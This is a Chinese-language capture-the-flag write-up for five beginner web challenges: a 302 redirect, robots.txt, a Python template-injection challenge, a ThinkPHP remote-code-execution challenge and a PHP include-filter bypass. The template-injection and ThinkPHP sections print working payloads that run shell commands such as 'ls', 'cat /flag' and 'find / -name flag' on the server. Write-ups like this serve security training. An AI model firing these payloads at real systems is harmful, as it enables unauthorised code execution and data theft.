01.
由题目描述,查看初始页面,apache的默认初始页面是index.php故直接访问,发现被转移了F12查看究竟
这里解释一下302请求
302 Found,原始描述短语为Moved Temporarily,是HTTP协议中的一个状态码(Status Code)。可以简单的理解为该资源原本确实存在,但已经被临时改变了位置;换而言之,就是请求的资源暂时驻留在不同的URI下,故而除非特别指定了缓存头部指示,该状态码不可缓存。
对于服务器,通常会给浏览器发送HTTP Location头部来重定向到新的新位置。 所以点击之后就发现了这道题flag
02.
查询了一下robots的协议然后我们访问robots.txt
请无视那个不许访问,就得到本题答案了
03.
这是一道python模板注入的题,经过百度学习
首先看看有没有漏洞点输入{{7+7}}
查看一下所有的模块,/{{[].class.base.subclasses()}},找到我需要调用的site._Printer(‘os’),列在72位。
在之后{{[].class.base.subclasses()[71].init.globals[‘os’].popen(“ls”).read()}}利用他查看文件都有啥
然后导fl4g图片{{[].class.base.subclasses()[71].init.globals[‘os’].popen(“cat fl4g”).read()}}
04.php_rce
查找flag:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
payload:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag
05.一种可以直接构造一个伪协议data://text/plain,xxxx(要执行的php代码)
另一种因为这个函数是区分大小写的所以就可以直接把php大写就可以然后用burp抓包传参就可以了